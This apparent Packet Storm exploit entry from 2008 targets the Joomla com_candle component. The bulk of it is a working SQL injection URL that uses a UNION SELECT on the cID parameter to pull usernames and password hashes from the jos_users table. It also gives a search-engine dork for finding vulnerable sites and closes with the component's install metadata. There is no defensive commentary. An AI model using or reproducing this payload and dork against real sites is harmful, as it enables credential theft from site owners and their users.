joomlacandle-sql.txt

2008-03-13T00:00:00
ID PACKETSTORM:64469
Type packetstorm
Reporter S@BUN
Modified 2008-03-13T00:00:00

Description

                                        
                                            `#############################################  
#  
########### JOOMLA com_candle SQL Injection(cid)  
#  
#############################################  
#  
##AUTHOR : S@BUN  
#  
####HOME : http://www.milw0rm.com/author/1334  
####  
####MAiL : hackturkiye.hackturkiye@gmail.com  
#  
#############################################  
#  
##DORK 1 : allinurl:"com_candle"  
#  
#############################################  
EXPLOIT :  
  
index.php?option=com_candle&task=content&cID=-9999/**/union/**/select/**/0x3a,username,0x3a,password,0x3a,0x3a/**/from/**/jos_users/*  
  
#############################################  
################# S@BUN ####################  
#############################################  
######## hackturkiye.hackturkiye@gmail.com ######  
#############################################  
  
<mosinstall type="component" version="1.0.0">  
<name>Candle</name>  
<author>Son Vu</author>  
<creationDate>March 2007</creationDate>  
<copyright>(C) 2007 Open Source Matters. All rights reserved.</copyright>  
<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>  
  
<authorEmail>sora4g@gmail.com</authorEmail>  
<authorUrl></authorUrl>  
<version>1.0.0</version>  
<description>Candle Component.</description>  
  
  
`